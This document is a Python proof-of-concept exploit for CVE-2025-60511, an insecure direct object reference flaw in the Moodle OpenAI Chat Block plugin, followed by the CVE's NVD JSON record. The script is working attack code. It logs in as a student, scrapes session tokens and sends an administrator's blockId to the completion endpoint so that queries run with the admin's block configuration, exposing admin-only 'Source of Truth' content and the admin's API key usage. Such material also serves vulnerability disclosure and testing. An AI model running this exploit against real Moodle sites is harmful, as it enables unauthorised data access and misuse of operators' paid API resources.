CVE-2025-60511

# CVE-2025-60511 - Moodle OpenAI Chat Block IDOR Vulnerability PoC # Author: onurcangenc # Reference: https://onurcangenc.com.tr/posts/idor-in-moodle-openai-chat-block-block_openai_chat-proof-of-concept-poc--cve-2025-60511/ import requests import re # Target Moodle instance configuration TARGET_URL = "https://target-moodle-site.com" USERNAME = "student_user" # Low-privileged authenticated user PASSWORD = "student_password" ADMIN_BLOCK_ID = "999" # Target admin's block ID (discovered via enumeration or other means) # Create a session to maintain cookies session = requests.Session() # Step 1: Authenticate to Moodle and obtain session cookie login_url = f"{TARGET_URL}/login/index.php" login_response = session.get(login_url) # Extract login token from the page login_token = re.search(r'name="logintoken"\s+value="([a-zA-Z0-9]+)"', login_response.text) if login_token: token = login_token.group(1) else: # Try alternate token extraction token = re.search(r'"sesskey":"([a-zA-Z0-9]+)"', login_response.text) token = token.group(1) if token else "" # Perform login login_data = { "username": USERNAME, "password": PASSWORD, "logintoken": token } session.post(login_url, data=login_data) # Step 2: Get sesskey for API request (Moodle requires sesskey for AJAX requests) profile_page = session.get(f"{TARGET_URL}/my/") sesskey_match = re.search(r'"sesskey":"([a-zA-Z0-9]+)"', profile_page.text) sesskey = sesskey_match.group(1) if sesskey_match else "" # Step 3: Exploit IDOR - Send request with admin's blockId api_url = f"{TARGET_URL}/blocks/openai_chat/api/completion.php" # The vulnerable endpoint accepts blockId without proper authorization check exploit_data = { "blockId": ADMIN_BLOCK_ID, # Admin's block ID - VULNERABLE PARAMETER "message": "What is the Source of Truth content?", "sesskey": sesskey } # Send the exploit request - will be processed with admin's block configuration exploit_response = session.post(api_url, data=exploit_data) print(f"Status: {exploit_response.status_code}") print(f"Response: {exploit_response.text}") # The response will contain information processed using the admin's # chat block configuration, including any Source of Truth entries # and using the admin's API key/model settings

{"cve": {"id": "CVE-2025-60511", "sourceIdentifier": "[email protected]", "published": "2025-10-21T17:15:40.303", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Moodle OpenAI Chat Block plugin 3.0.1 (2025021700) suffers from an Insecure Direct Object Reference (IDOR) vulnerability due to insufficient validation of the blockId parameter in /blocks/openai_chat/api/completion.php. An authenticated student can impersonate another user's block (e.g., administrator) and send queries that are executed with that block's configuration. This can expose administrator-only Source of Truth entries, alter model behavior, and potentially misuse API resources."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "http://moodle.com", "source": "[email protected]"}, {"url": "http://openai.com", "source": "[email protected]"}, {"url": "https://github.com/onurcangnc/moodle_block_openai_chat", "source": "[email protected]"}, {"url": "https://onurcangenc.com.tr/posts/idor-in-moodle-openai-chat-block-block_openai_chat-proof-of-concept-poc--cve-2025-60511/", "source": "[email protected]"}]}}